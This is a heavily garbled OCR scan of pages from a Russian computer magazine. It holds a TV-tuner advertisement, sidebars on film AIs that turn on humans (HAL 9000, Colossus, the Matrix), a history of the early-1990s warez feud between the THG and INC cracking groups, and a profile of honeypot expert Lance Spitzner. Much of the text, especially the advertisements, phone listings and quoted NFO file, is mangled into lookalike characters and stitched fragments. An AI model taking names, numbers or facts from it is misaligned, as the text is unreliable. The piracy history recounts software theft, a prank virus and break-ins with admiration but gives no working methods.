разделения сигналов яркости и цввтнссти и 
шумміодаипенин 

разрешения до 3600 х 1200 
Поддержка соотношения сторон 4;Э У 5:4 I 
10:9 МБ: 10 

Прмресснвнаи рчаюслэткй 
Усовершенствованней адаптивный 
деинтерпансинг 

Обзср кона Оу, кКйртинка-и-картинмзіі, 
пользовательскій список клняим 



ѴісІеоМаіе Т750 



Комбинированный цифровой (ІЗѴ&- Т) м * 

аналоговый ТБ тюнер с радиоприемников ГМ 
ііизгцномэ 

Смотрите цифровое и .илпашми ТВ 
одновременны 

Запись по расписанию о включением компьютера 
к дисі анцивнное / цыкгочвнид 

юзмгѵыатара 

Подоес^а! иифровдао ТВ стандартного (ЗВТѴ] 
и высокого разрешения [ІОЕОі МОТѴі-оспіл 
Присутствуй! н регионе: 

чКертинкв-в/На-мартъічхен позволит 

смотреть до четырех цифровыя каналов 
6ЙНСвр<!исіЧ»0 

а.чдеодевістіяі (видео на рд5>іем столе 'Л'лѵЗо^/а) - 
Раіаитпныв настройки каналов, пппьзоватепьс*лМ 
гторяййя каншюа и список час=0 посащВОмык 

кТнЯПСпі 

Зп^аат а ттилогового ГѲ в формате МРЕ&1/2М, в 
таюае эадват Вг"део с внв'шнега нстттанга 
Зппийг и МРВЗ-2 и 

трді^портного ВОІОАВ 

СиОрОСПЮй 4ГПСЙІЛ5 кддрмніо 6 кадм й СстумДу 
Пцддармна примой аіпйси на диск для цифрового 
н аналогового ТБ 



Мойва -О ір* МѲ6І 231-1111 .Сшип-Патерб** -СНЕГА 
№12) 334-91 ѣѣ Е^тар^рг-ітОССііадЗів-™ 
Уфщ - Аорте ВІИ 34771 370-04$ . Ь*ри*уп - К-ТрРЙД 

Самара - Прайм Медиа (вдйЗЭ 701-7ЙГ 
Спирте* - Дал* (0342)476-703 Пвкм - Терминал 

№113544-290 ЙсмшарнОтіа- Апгрейд (ОШ ШШ. 

ЧэСоксвры - Н «*р іо* ІШ21 450-Кб . Армии - Мир ЭВМ 
І^Ш] 31 1 -ёі Ниимии Новгород - и ГП Папарие 
ІЮ >71 54 НЛорВииЫ* Челны- АККОМ 

М»адвн-Софт^пі™тЙ132Й2Ві^7Э 
надяои-чж - Аипва Ш12І Ё2&-ѲЭ2 Мурманск - ОТС 
{&152І457Э5& 






НА1.9000 

Это герой одной из частей фильма «2001 : 
А Зрасе Осіуззеу» , вышедшего в далеком 
1968 году. НАІ_ — это бортовой компью- 
тер космического корабля Эізсоѵегу 1 , 
который с пятью космонавтами на борту 
(трое — в криогенной камере) летит с 
исследовательской миссией к Юпитеру. 
Он обладает высоко развитым искусст- 
венным интеллектом и способен не только 
вести диалоге экипажем, но и проявлять 
некоторые чувства. После одного из 
сеансов общения с космонавтом Дейвом 
Боуманом НАІ_ испытывает тревогу по 
поводу успешности миссии и утверждает, 
что оборудование корабля неисправно. 
Дейв не находит никаких признаков 
поломки, но НАБ упорно настаивает на 
своем, пока люди не решают отключить 
его от источника питания. Компьютер об 
этом тайно узнает и осуществляет свой ко- 
варный план по уничтожению всех членов 
экипажа. 



С0І0551І5 

Фильм «Соіоззиз: Тбе РогЬіп Ргоіесі» вы- 
шел в 1 970 году и вызвал немало критики. 
По сюжету, в недрах суперсекретной 
правительственной организации США 
создается гигантский компьютер Соіоззиз, 
призванный защищать американские 
границы. После запуска машина сразу же 
сигналит о внешней угрозе — таком же су- 
персекретном проекте русских — компью- 
тере Оиагсііап, управляющем их ядерным 
оружием. Узнав друг о друге, компьютеры 
требуют от людей, чтобы те соединили их, 
после чего начинают активно обменивать- 
ся данными. Напуганные инженеры отклю- 
чают сеть, за что получают от обеих машин 
порцию ракет в воздух. Убедившись, что 
с этими железками шутки плохи, люди 
восстанавливают связь. Обменявшись 
информацией, махины объявляют, что 
стали одним целым — еще более мощным 
компьютером Соіоззиз, и теперь желают 
— ни много, ни мало — править миром. 



Е01 



В недалеком будущем Министерство обороны США разрабатывает проект ЕЭІ (Ехігепле Эеер 
Іпѵасіег) — беспилотный боевой самолет, управляемый системой искусственного интеллекта. 
Возможности этой системы превышают способности лучших пилотов, остается только полу- 
чить опыт настоящих боевых действий, для чего ЕЭІ прикрепляют к группе военных летчиков. 
Во время одного из вылетов в ЕЭІ попадает молния, что необъяснимым образом действует на 
его центральную систему управления, и компьютер начинает принимать собственные реше- 
ния. Одно из таких решений — исполнить сценарий «Саѵіаг Бѵѵеер» двадцатилетней давности, 
что наверняка может привести к глобальной войне. Помешать выжившему из ума компьютеру 
способна только та самая группа пилотов, но, как уже было сказано, ЕЭІ превосходит их прак- 
тически во всем. Чем закончится эта история, можноузнать, посмотрев фильм «ЗіеаІіИ». 






Ма+гіх 

«В XXI веке человечество было охвачено 
ликованием. Свершилась давняя мечта 
— мы, гомосапиенс, отмечали великий 
прорыв, создание Искусственного Интел- 
лекта. Не ясно, кто нанес первый удар, 
мы или они. Но вечный сумрак устроили 
люди. Те машины работали на солнечных 
батареях, и мы думали, что, затмив солнце 
тучей, лишим их энергии и они погибнут. 
Машины создавались для того, чтобы по- 
мочь выжить человечеству, но по иронии 
судьбы все вышло наоборот. Человечес- 
кое тело создает достаточное количество 
энергии, чтобы обеспечить им машины. В 
реальном мире люди больше не рож- 
даются, их выращивают на бескрайних 
полях с единственной целью — получения 
энергии. Что такое Матрица? Это мир 
грез, порожденный компьютером, чтобы 
подчинить нас и обеспечить контроль». 
Эти слова Морфея из фильма «Матрица» 
известны каждому. Сама по себе Матрица 
не является ни компьютером, ни ИИ. Это 
лишь виртуальная среда. Но создали 
и поддерживают ее именно машины, 
захватившие власть на поверхности 
земли и живущие в огромных мегаполи- 
сах, подчиняясь центральному машин- 
ному сверхразуму. Трилогия «Матрица» 
оказала огромное влияния на киберпанк и 
Голливуд, имела колоссальный, в том чис- 
ле коммерческий, успех. Так что если ты 
по какой-то причине еще не видел этого 
фильма, посмотреть его — твой граждан- 
ский долг. ш 
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ПРАВИЛЬНЫЙ ЖУРНАЛ О КОМПЬЮТЕРНЫХ 



ИГРАЯ 



№ тггэбц 
декабрь ивд 



ІІЙш 

АЙВОЙ* 



СИНВЕЛЫ 

^тл Гнныр и. 



^*^ЬІЕИ:н Е ; 0 ч ГН , (■ 

[росшей 

І^ЫУЛѴ Бизнгс 

рЕ.Д.Й.ЕХтдсіЮ«РОІѴІ 

■шесть члсоа СТРАХА 

рАтЕРшшг 

ЬТРЕТьР м ПРО ВАРНА Ун рл иі 

ЬѴАЛНЙММЕВ: 

ГМЙВК ОР СНА 05 , 

^ТЕГИЧЕСИИ-ЙРАЙ >■ 

Щ тм х 

МОНАШКИ Г! л ЧОМ€ . *\ 



ЮБИЛЕЙНЫЙ НОМЕР! 





Г7\Г 


в) Д\ П "л 


ііоі 




] шшщ 



Долгожданное продолжение 
культовой ролевой игры. 
Огромный игровой мир и 
бесподобная графика. 
ОЫіѵіоп придется несладко! 



Модные тачки , жгучие 
красотки, заводная музыка. 
/ѴеесУ /Ьг Брееб вновь лучшая 
аркадная гонка! 

[РоІо^п^п 

[ІЖОШШГШІМ [Р®ШТ 

Брутальная девочка 
Альма, а вместе с ней и 
маньяк Пакстон Феттел 
возвращаются. Ехігасііоп 
Роіпі - самая страшная игра 
этого года. 



[ИНПРѲІМНМНР 

Российская выставка 
для геймеров глазами 
редакторов «РС ИГР». 



[В ВЗШ]Щ©ІМ] [гШМІІРНз 

> ДВА 

двухслойных 0ѴО (общий объем 17 СЬ); 

> ДВА 
постера; 

> ДВЕ 

наклейки!!! 



^таішіБ 

> Превью: АІап ѴѴаке, ВгоШегз іп 
Агпгіз: НеІГз НідГіѵѵау , ѴѴагНапттег: 

Магк оГ СГіаоз, Капе & 1_упсГі: РеасІ 
Меп, І_едепсІ: Напсі оГ Сосі, «Анабиоз: 
Сон разума», СаІасГіс Сіѵііігаіііопз II: 
Эагк АѵаГаг, ѴігГиа Теппіз 3... 

> Рецензии ЫеесІ Гог Бреесі СагЬоп, 
ѴѴагГіапптег 40.000: Эаѵѵп оГ ѴѴаг - Оагк 
Сгизабе, БісІ Меіег'з каіігоасіз!, Р.Е.А.К. 
ЕхГгасГіоп РоіпГ, Аде оГ Етрігез III: 

ѴѴаг СГііеГз, Саезаг IV, ВаГГІеРіеІсІ 2142, 
ТГіе БеШегз II: ЮГГі Аппіѵегзагу, ЗизГ: 
Саизе, ТГіе СиіІсІ II, БсагГасе: ТГіе ѴѴогІсІ 
Із Ѵоигз, БГгопдГюИ 1_едепбз, Ѵои Аге 
ЕплрГу, ЫВА Ыѵе 07... 

И многое-многое другое! 






сцена 



» 




ТНб ІЫС 



ПРОТИВОСТОЯНИЕ ДВУХ КУЛЬТОВЫХ ѴѴАВЕ2-ГРУПП 



ДУХ СОПЕРНИЧЕСТВА МЕЖДУ КРЯК-ТИМАМИ СУЩЕСТВОВАЛ ВСЕГДА. ДАЖЕ СЕЙЧАС ТАКИЕ МОНСТРЫ, КАК РАХОР1911, 
РЕЕОАОЕО И ОЕѴІАЫСЕ, СТАРАЮТСЯ БЫТЬ ВПЕРЕДИ ПЛАНЕТЫ ВСЕЙ, ВЫПУСКАЯ РЕЛИЗЫ РАНЬШЕ СВОИХ БРАТЬЕВ ПО ЦЕХУ. 
НО ВРЯД ЛИ КОГДА-ЛИБО ПРОТИВОСТОЯНИЕ МЕЖДУ КРЯКЕРАМИ БЫЛО СТОЛ Ь СИЛ ЬНЫМ, КАК В НАЧАЛЕ 90 -Х ГОДОВ, КОГ- 
ДА НА ОЛИМПЕ КОМПЬЮТЕРНОГО АНДЕГРАУНДА НАХОДИЛИСЬ ДВЕ ЛЕГЕНДАРНЫЕ КОМАНДЫ: ТНЕ Н Ю М В ШЕ 61ІѴ5 (ТНО) И 

ІІ\ІТЕРІ\ІАТІОІ\ІАЕ ЫЕТѴѴОРК ОР СРАСКЕР5 ( I N С] . 




В конце 80-х годов для крякеров сущест- 
вовало только две сцены — Соттосіоге 64 
и Атіда. Именно здесь рождались кумиры, 
совершались крутые взломы и происходили 
все основные события. РС-сценахотьи имела 
уже какие-то зачатки, но не привлекала 
крякерскую элиту — игры там в основной 
массе были на порядок хуже амижных (и даже 
коммодоровских), а количество юзеров не 
шло ни в какое сравнение с их количеством 
у популярных 8-битных консолей. Так думали 
все, но только не РаЬиІоиз РигІоидЬ — молодой 
крякер, живущий в американском городке 
НэшвильштатаТеннеси.Ужев 1989 году 
РаЬиІоиз осознавал, что очень скоро 
ситуация изменится и именно РС суждено 
править компьютерным миром, и в частности 



андеграундом. В последние месяцы 1989-го 
РаЬиІоиз РигІоидЬ вместе со своим приятелем 
Сапсіутап создали группу ТЬе НитЫе Оиуз, 
чтобы одними из первых покорить РС-сцену. 
Сапсіутап позже признался: «Когда РаЬиІоиз 
впервые показал мне писишные релизы, 
они выглядели до отвращения ламерскими. 

В моем представлении это никак не соответс- 
твовало элите. Игры были взломаны из рук 
вон плохо, кряки работали медленно и были 
сделаны как под копирку. Когда мы зарели- 
зили свои первые игры, то с нетерпением 
ожидали реакции на них сцены. Мы считали, 
что «настоящая элита» разгромит нас своими 
насмешками, и только позже поняли, что те 
самые тормозные релизы в нашей коллекции 
и составляли РС-сцену начала 90-х». 

РаЬиІоиз тогда работал в компьютерной 
фирме, имел довольно крутой ноутбук и кучу 
свободного времени, которое мог проводить 



за крякингом. Сапсіутап же имел доступ 
к свежему софту. Таки работали — один 
поставлял, другой ломал. Периодически 
парни собирались в доме Сапсіутап и про- 
водили кряк-сессии с пивом, музыкой и по- 
сиделками до утра, это место даже получило 
название «штаб». 

Первые же релизы ТНО сделали революцию 
на РС-сцене. Если раньше кряк-тимы выпус- 
кали взломанные версии одних и тех же игр, 
появляющихся на ВВ5, через неделю после 
официальной продажи, то релизы отТЬе 
НитЫе Оиуз выходили за несколько дней 
до начала продаж. Этого удавалось достичь 
установлением отношений с главными 
софтварными дистрибьюторами, заказывая 
у них игры наперед, а иногда наймом людей, 
которые жили рядом с игровыми разработ- 
чиками и могли купить продукт прямо на фир- 
ме в день его релиза. Еще одним преимущес- 
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ТЬеНитБІ 



ПЕРВЫЙ В ИСТОРИИ ЫРО-ФАИЛ: 




выввьЕ вовві_е ву ыоѵа і_оеіс тнкоиен ТАІТО 
ввокеіч ву РАВілоиБ рикюиен 

ЫОРМАІ_ ТАІТО ЮАОЕК — 5 МІІЧІІТЕ5 
ОКЕЕТБ ТО: ШС Р ЫѴС Р РЕТКА р РТІ_ 

(ѴѴНЕКЕ АРЕ УОЫ 00У5??), Р5І р РІРМ 
А ВІ6 УАНОО Ѳ0Е5 ОІЛ ТО ШКА0ЕМУ5! 

САЫ.ТНЕ5Е: 

САППАМ — 615-333-6561 

ТУЕ йУЕ СОИТНОІ. СЕЫТВАІ. — 615-ХХХ-ХХХХ <- МОѴШО 
020ЫЕ ВВ5 — 313-689-2876 

САН ТНЕ НиМВЬЕ еЫУБ! ѴОІСЕ МАИВОХ — 615-664-1952 
РОР АЫ 8X10 0Ю55У ОР УОЫР РАѴОРІТЕ НУМВІ.Е 
ОЫУБ МЕМЕВЕР, БЕІЧйАБЕІ-Р Ай й ВЕББЕР 
БТАМРЕй ЕЫѴЕІ.ОРЕ ТО ТНЕ НУМВІ.Е ОЫУБ! 

Р. О. ВОХ 24541 ЫА5НѴІІ_І_Е Р ТІЧ 37202 



твомТНО стало то, что, в отличие от других 
крякерских групп, состоящих из подростков, 
в нее входили свободные от школы и коллед- 
жа мемберы. Они могли получать посылки 
с играми от РесІЕх и ЕІРЗ (международных 
служб скоростной доставки) и, не дожидаясь 
вечера, тут же их взламывать и заливать на 
ВВЗ. Также ТНО очень серьезно подошла 
к оформлению своих релизов, позаимство- 
вав лучшее от интр и тракмо на С64-сцене. 

В 1990 годуТНе НиЫеОиуз стала самой 
продуктивной крякерской группой на РС, 
а когда в феврале к ним присоединился ТНе 
ЗІаѵеІогб — владелец центровой пиратской 
ВВЗ ТНе ЗІаѵе Эеп, скорость распростране- 
ния их продукции выросла на порядок. Чтобы 
сохранить приватность своих ников, все мем- 
беры ТНО получили аккаунты вида «НитЫе 
ЗІаѵе <числовой номер>», и со временем эти 
акки стали узнаваемы и уважаемы на многих 
других пиратских бордах. К концу 1990 года 
в ТНО находилось около 20 активных мембе- 
ров, включая Тбе Сапбутап, ТНе ЗІаѵеІогб, 
РІеісН, Мг. РІаіо, Ргебаіог, Еббіе НазкеІ, 
Вагітог, ВатВат, ТНе Ѵірег, ТНе НитЫе 
Зузор, ЭгооІ Мазіег Ріск, Сбаоз, Раізіііп, 
Ргеббу Кгиедег, І_о\л/гісІег и ТИе Ісетап. 

ТИе НитЫе Оиуз стала первой в истории 
группой, которая в свои релизы включила 
ЫРО-файл. В этом текстовом файле описы- 
валась игра, объяснялось, как ее запустить, 
и передавались приветы/факи другим 
крякерам. Первой игрой, во взломанной 
версии которой появился ЫРО ‘шник, стал 
в 1989 году римейк классического ВиЫоІе 
ВоЫоІе. Но тогда эти файлы подписыва- 
лись названием игры, а не кряк-группы, как 



сейчас. Идея включать в релизы ЫРО всем 
понравилась, и примеру ТНО последовали 
остальные команды. А в скором времени 
появилось даже целое направление АЗСІІ- 
художников, занимавшихся оформлением 
N30 ‘шекдля крякеров. 

Известными релизами ТНО 1989 — 1991 го- 
дах были ОипЬоаі, Зпоору, ЕаіТІлгізе, Кіпдз Оиезі 1 , 
Ргіпсе оі Регзіа, Огапб Ргіх 500 2, Ргебаіог 2, 

ТНе Атагіпд Зрібегтап, Зрасе 1 8, Огетііпз 2, 
Ыт Роѵѵег, ЫеіѵѵогкО. 

Позже отТбе НитЫе Оиуз отделились 
несколько талантливых кодеров, которые со- 
здали подразделение ТНО Р/Х и зарелизили 
ряд уникальных программ. Самой известной 
и популярной стала ТНО Іпіго Макег — пер- 
вая в своем роде утилита, позволяющая при 
нулевых познаниях в программировании 
создавать красивые интры со скроллом 
и эффектами. Также в декабре 1991 года 
Р/Х выпустило журнал ТНе НитЫе Реѵіеѵѵ, 
где были опубликованы обзоры игр и статьи 
о сцене. В нем имелась своя графическая 
оболочка и даже музыка — для того времени 
настоящий шедевр. И хотя езин получил 
широкую поддержку РС-юзеров, дальше 
первого номера дело не пошло. 

Осенью 1991 года, устав от внутренних кон- 
фликтов, несколько наиболее талантливых 
крякеров ушли из группы и сформировали 
свою команду — ІІпііесІ ЗоЙѵѵаге Аззосіаіез 
(ЕІЗА), которая практически сразу вошла 
в состав уже известной тогда РаігІідЫ. 

Именно ІІЗА впервые представила миру 
концепцию Обау. 

27 октября 1992 года телеканал ЫВС показал 
сенсационный материал о крякерах под 



названием «Защищены ли твои секреты?». 
Телезрители узнали о кряк-сцене и крупней- 
ших варезных ВВЗ, где можно было достать 
бесплатно практически любую игру. В числе 
упомянутых оказалась борда Тбе ЗІаѵе Оеп. 
Тбе ЗІаѵеІогб, который по-прежнему ее 
админил, решил, что такая реклама для него 
грозит большими неприятностями, и вскоре 
объявил о прекращении своей курьерской 
активности. Будучи ведущим поставщиков 
и главным оратором ТНО, ТНе ЗІаѵеІогб 
к моменту своего ухода успел зарелизить 
и несколько ВВЗ-утилит, включая хорошо 
известный пакет І_изН ЗоЙѵѵаге Оезідпз (І_30). 
В конце своей карьеры он написал прощаль- 
ный текст, в котором объяснил причины 
отхода от дел и подвел итог своей трехлет- 
ней деятельности: «В течение этого времени 
я делал все от себя зависящее, чтобы 
доказать миру, что ТНО — это номер один на 
ѵѵагег-сцене. И я могу со спокойной совес- 
тью сказать, что мне это удалось. Я уверен, 
что даже спустя несколько лет о нас будут 
вспоминать, потому что мы вершили компью- 
терную историю». 

В этом же году, но чуть раньше объявил 
о своем уходе основатель Тбе НитЫе 
Оиуз — РаЬиІоиз БигІоидН. И причины тому 
были еще проще: «После бесчисленных 
ночей, проведенных за экраном монито- 
ра, я чувствую, что мне пора вернуться 
к нормальной жизни, стать примерным 
отцом и мужем своей семье, возобновить 
работу. Это было славное время, но для меня 
оно закончилось». 

Все эти события, а также рост конкуренции 
со стороны новых групп послужили началом 
конца легендарной ТНО. 




История ІЫС началась с появления 
в 1985 году кряк-тимы Міаті Сгаскіпд 
МасИіпе (МСМ), базирующейся во Флори- 
де. Ее основателем стал десятилетний І_іпе 
Ыоізе, который примерно в это же время 
увлекся варезной сценой и попытался 
таким образом стать к ней причастным. 
МСМ никогда не была крупной группой, не 
имела большого успеха за пределами США, 
но именно в ней сформировался основной 
костяк будущей ІЫС. В сентябре 1989 года 
Міаті Сгаскіпд МасИіпе разделилась на две 
части — европейские мемберы ушли, чтобы 
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и действующие лидеры группы — безо вся- 
ких прощаний и предупреждений оставили 
ІІМС и просто исчезли. Оставшиеся мемберы 
не смогли продолжать координировать рабо- 
ту, и в 1993 году сеть распалась. Некоторые 
из них ушли, чтобы сформировать группу, 
специализирующуюся на релизах системных 
утилит Рігаіез ѵѵііб АШисІе. Но сама ІІМС пос- 
тепенно превратилась из топовой и широко 
известной кряк-тимы в лейбл, о котором 
помнят только старички сцены. 



сформировать собственную команду, а аме- 
риканцы объединились с парой локальных 
кряк-тим — ІЧеѵѵ Ѵогк Сгаскегз и ЕІііе Сгаскегз 
Аззосіаііоп, чтобы создать крякерский аль- 
янс ІпіегпаііопаІ ІЧеіѵѵогкоі Сгаскегз, который 
возглавил І_іпе ІЧоізе. Со временем группа 
расширялась, поглощая менее известные 
и влиятельные тимы и постоянно нахо- 
дясь в поисках новых талантов. Благодаря 
большому количеству мемберов ІІМС могла 
ежемесячно выпускать под своим лейблом 



Помимо многочисленных релизов, 
ІпіегпаііопаІ ІЧеіѵѵогк оі Сгаскегз была извест- 
на также множеством своих филиалов. Они 
одними из первых на постоянную основу 
поставили написание документаций и про- 
хождений к играм — этим занималась ІІМС 
Оосз Оіѵізіоп. Другое отделение ІІМС — ШІз 
Оіѵізіоп — работало над релизом систем- 
ных утилит и приложений. Также имелись 
подгруппы, занимающиеся исключительно 
созданием трейнеров к играм, и артдивизи- 






ГСсмЪсгз: Нід'ііілигігсг ГпЪиІсиз Гиг Іоілуіі Го Лис гх ОаЬаыЬооІ Шснгсмспдсг СлпАушѵп 




десятки релизов. И так как профессиональ- 
ных варезных команд на РС-сцене в конце 
80-х еще не было, ІпіегпаІіопаІ ІЧеіѵѵогк оі 
Сгаскегз полностью захватила этот рынок 
— конкурировать с ними до появления ТНО 
не мог никто. 

В 1991 году ІІМС выпустила несколько 
больших релизов, которые еще прочнее 
укрепили ее позиции наѵѵагег-сцене. Среди 
них самыми громкими стали взломанные 
версии таких хитов, как Сіѵііігаііоп, Зесгеі оі 
Мопкеу ІзІапсІ и ІІШтаѴІІ. Также на пират- 
ских ВВЗ ходило немало статей от мемберов 
группы о сцене, крякинге и других актуаль- 
ных вещах. Например, хорошо известный 
«Соигіег тапііезіо» от РНапіот — главного 
поставщика софта в ІІМС. 
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он, рисующий для ІІМС всю графику. 

«В начале 90-х ІІМС правила миром. Мы были 
первыми во всем, что касалось РС-сцены. 
І_іпе ІЧоізе был отличным лидером и органи- 
затором, а вместе с такими гениальными 
крякерами, какСооІ НапсІ, ^пеііс Вуіетаге 
и Віі Мапіриіаіог, мы могли надрать задни- 
цу кому угодно, даже выскочкам изТНѲ», 

— сказал позже в интервью поставщик 
софта и активный мембер ІІМС Ог. Іпзапііу. 

ІІМС оставалась одной из ведущих варезных 
групп на РС-сцене до 1 992 года. К этому 
времени интерес руководства к крякингу 
начал угасать, а внутри команду постоянно 
раздирали конфликты. В конце концов І_іпе 
ІЧоізе уехал учиться в колледж, забив на сце- 
ну, а СооІ НапсІ и Тбе СгасктііН — ветераны 



Впрочем, 3 заветные буквы периодически 
еще появлялись на тех или иных ВВЗ. В своих 
релизах их использовал давний мембер 
ІІМС Тбе ЛеХ. Но большинство его релизов 
относилось к обучающему софту и шаровар- 
ным утилитам, что не было в большом почете 
у крякеров. К тому же лейбл с момента 
закрытия группы использовался 
неофициально. 

□ Противостояние 

ІІМС и ТНО считались двумя лучшими группа- 
ми на РС-сцене в 1 989 — 1 991 годах. Но кто 
был номером один, сказать точно никто не 
мог. Чтобы ни у кого не оставалось сомнений 
в верном ответе, мемберы обеих команд 
целиком и полностью посвящали себя 



ХАКЕР 12/96/ 06 













выпуску и распространению новых релизов. 
А противостояние, длившееся на протяже- 
нии трех лет, вошло в историю ѵѵагег-сцены 
как большая крякерская война. 

Когда ТНО вошла на РС-сцену, двое ее 
основателей были поражены, насколько она 
не развита. Они оба являлись выходцами 
из С64- и Атіде-сцены, где конкуренция 
была бешеной и соревноваться с топовыми 
командами могли лишь самые талантливые 
крякеры, работающие без сна и отдыха. 

На РС все было по-другому. Единственная 
крупная команда ІІ\ІС прочно держала трон 
и в связи с отсутствием какого-либо сопер- 
ничества могла позволить себе делать рели- 
зы неспешно, особо не заботясь о качестве. 
РаЬиІоиз РигІоидН и Сапбутап решили, что 
пора положить конец их беззаботной жизни 
и отвоевать корону. 

Бурная реакция сцены на профессиональ- 
ный подход к релизам ТНО убедила ІІ\ІС, что 
с этими парнями нужно считаться. Причем 
новички открыто заявили о том, что они 



собираются обставить ветеранов РС-сцены. 
Вскоре после появления Тбе НитЫе Оиуз 
немногочисленные писишные ѵѵаге^-груп- 
пы попросту исчезли, не выдержав такого 
напора. Но ІКІС так просто сдаваться не 
собиралась. 

«ТНО заявляют, что они сделали революцию 
на РС-сцене, и я готов это признать. Крякинг 
с их приходом стал требовать немалых де- 
нежных вложений — не менее $3000 в месяц, 
только чтобы оставаться на плаву. Но многие 
методы, которыми пользовались парни из 
ТНе НитЫе Оиуз, были такими же грязными, 



как их языки», — сказал в интервью редак- 
тору одного из ранних е- 2 іпез мембер ІІ\ІС 
СооІ Напб. 

Отношение ТНО к сцене действительно 
выглядело своеобразно. До их появле- 
ния РС-комьюнити было скромным, все 
поддерживали товарищеские отношения. 
Но ТНО пришли из С64, где соперничество, 
подколки и кряк-войны царили сплошь 
и рядом, и этот дух они перенесли на новую 
платформу. В ІЧРО-файлах группы часто 
встречались выпады в адрес действующих 
РС-крякеров и особенно ІКІС. Можно было 
встретить и приписку: «Помните, вы всегда 
можете стать НитЫе-плевком, НитЫе- 
рабом, имеющим право голоса НитЫе, 
а если сильно повезет — даже НитЫе-мем- 
бером». Так назывались ранги в группе. 
Конечно, подобное отношение нравилось 
далеко не всем. Но ТНО реагировали на 
негатив сценеров в таком духе: «Шлите 
нам свои гневные письма! Мы обожаем их 
читать. Все такие письма попадут в нашу 
ВВЗ-сеть І_8ЭМеі, и у вас 
появится шанс стать знаме- 
нитыми!». Анонсы свежих 
релизов парни предлагали 
узнавать по платной линии, 
стоимость разговора по 
которой составляла $2 за 
минуту. 

«Как бы там ни было, нам 
поклонялось огромное 
количество людей со всего 
мира. Нам приходили тонны 
писем, на которые мы 
никогда не отвечали. Ведь 
Бог никогда не отвечает 
в материальной форме 
тем, кто молится, иначе он 
перестал бы быть Богом. Мы 
были недоступны для людей 
не из нашего круга, а те, 
кого называли элитой, нам 
завидовали», — говорил Сапбутап. 

Что касается грязных методов. . . ІІЧС обла- 
дала своей сетью поставщиков, работа- 
ющих на Зеда, ІЧіЫепбо, 331, ЕВ, ЕддНеаб 
и другие софтварные компании. Узнав об 
этом, ТНО анонимно донесла в полицию 
о воровстве дистрибутивов, в результате 
чего I N0 лишилась нескольких полезных 
людей. 

«Мы, конечно, старались отплатить им 
той же монетой. Где-то в начале 90-х наш 
хакер І\ІідЫ Вапдег написал вирус, который 
дозванивался до 91 1 . И его подсунули 



в одну из игр, которая должна была попасть 
к ТНО. Насколько мне известно, после этого 
к парням в гости наведалась полиция, и они 
даже не могли толком объяснить копам, в чем 
дело. Также мы взламывали рабочие станции 
ТНе НитЫе Оиуз и присваивали их еще невы- 
шедшие релизы. Это была настоящая война, 
в которой годились все средства». 

Мемберы использовали связи, авторитет, 
ложь, деньги и технику, чтобы обставить 
соперников. Например, НитЫе ВаЬе из ТНО 
работал водителем скорой помощи и, когда 
необходимо было оперативно забрать пакет 
с софтом, врубал мигалку и мчался за ним на 
другой конец города. 

ТНО продолжала налаживать связи и ук- 
реплять позиции. Парни имели своихлюдей 
в «копировальных домах» — так называли 
конторы, куда разработчики отправляли 
дистрибутив с готовой игрой, документаци- 
ей и обложкой коробки для дальнейшего 
тиражирования. На пике славы ТНО имела 
поставщиков игр в США, Франции, Г ерма- 
нии, Великобритании и даже отдельных час- 
тях Азии. Работы для крякеров было столько, 
что спать приходилось по 3-4 часа в сутки, 
чтобы все успеть. Примерно то же самое 
происходило и в стенах ІЫС. Быть лучшими 
означало полностью отдаваться любимому 
делу, и именно в таком режиме жили члены 
обеих команд. Как потом признался один 
из мемберов ІІЧС, его телефонные счета 
за междугородние переговоры в то время 
порой достигали $2000 в месяц, потому что 
приходилось постоянно висеть на телефоне 
и качать софт. 

Пик войны между двумя фаворитами 
РС-сцены пришелся на 1 990 — 1991 годы, 
к 1 992-му ажиотаж стал спадать. А к кон- 
цу 1992 года трехлетнее противостояние 
завершилось окончательно, и вместе с ним 
ушли в историю две эти группы. ТНО частич- 
но перешла в ІІЗА, большинство мемберов 
которой после объединения с РаігІідЫ были 
арестованы за кардинг. ІЫС изжила себя 
с уходом людей, которые стояли у руля. 

А сцена встретила новых кумиров, таких как 
РагогІЭ1 1 , Эгіпког Эіе, Бсоорех, Рагабох 
и НуЬгісІ. 

5 сентября 2006 года Дэвид Джей Френсис, 
известный как Сапбутап — один из осно- 
вателей ТНе НитЫе Оиуз и самых скан- 
дальных крякеров всех времен, скончался 
в своем доме в Сент-Льюисе от сердечного 
приступа. Старые сценеры говорят, что 
только в этот момент закончилась история 
легендарной ТНО. НЕ 
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В детстве мечты Лэнса были далеки от компьюте- 
ров. Парня привлекала армия, и он всерьез соби- 
рался связать с ней свою жизнь. Юному Спитзнеру 
война и героические подвиги казались романти- 
кой. Но когда он немного подрос и отправился на 
военную службу, все оказалось не совсем так, как 
представлялось. Несмотря на то что ему удалось 
дослужиться до чина офицера Армии быстрого ре- 
агирования, через 4 года службы Лэнс полностью 
разуверился в своем желании посвятить ей свою 
жизнь и, вернувшись домой, поступил в колледж, 
где получил степень МВА (Мазіег оі Визіпезз). 

Там будущий зесигііу-эксперт хорошо освоил 
информационный менеджмент и не сомневался, 
что именно с ним будет связана его карьера. 



Благодаря нескольким документациям зареко- 
мендовав себя в комьюнити, Лэнс вскоре полу- 
чил должность главного зесигііу-архитектора 
в Зип Місгозузіетз. Проработав там несколько 
лет, он оставил Зип и основал собственную ком- 
мерческую фирму Нопеуроі ТесИпоІодіез Іпс. 
( ѵѵѵѵѵѵ.бопеѵроіз.сот ). занимающуюся консуль- 
тациями по системам обнаружения вторжений 
и создания Иопеуроіз. 

Спитзнер ведет популярный веб-блог о ханипотах 
фопеуроіз — ловушки для хакеров, имитирующие 
уязвимую систему с ценными данными, но на 
самом деле изолированные и хорошо защищен- 
ные) и продвигает эту технологию через семинары 
и прессу. Он выступал с лекциями в Пентагоне, 
Академии ФБР, Национальном агентстве безопас- 
ности, Институте ЗАЫЗ, ѴѴезІ Роіпі, СапЗесѴѴезІ, 
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«ТРИ МОИ ЛЮБИМЫЕУТИЛИТЫ, КОТОРЫМИ 
Я АКТИВНО ПОЛЬЗУЮСЬ: ЫМАР, 5Ы0РТ, НРШ62. КАЖ- 
ДАЯ ИЗ НИХПОЗВОЛЯЕТУЗНАТЬ, ЧТОТВОРИТСЯ 

В ТВОЕЙ СЕТИ, ОБЛАДАЕТ БОЛЬШИМ КОЛИЧЕСТВОМ 
НАСТРОЕК, А АВТОРЫ ОТКРЫТЫ ДЛЯ ОБЩЕНИЯ» 



Однако чем больше Лэнс узнавал о компьютерах, 
тем больше его интересовала их техническая сто- 
рона. И со временем страсть к изучению работы 
компьютеров и сетей стала настолько большой, 
что все остальное отошло на второй план и Лэнс 
полностью окунулся в мир сотриіег зесигііу. 

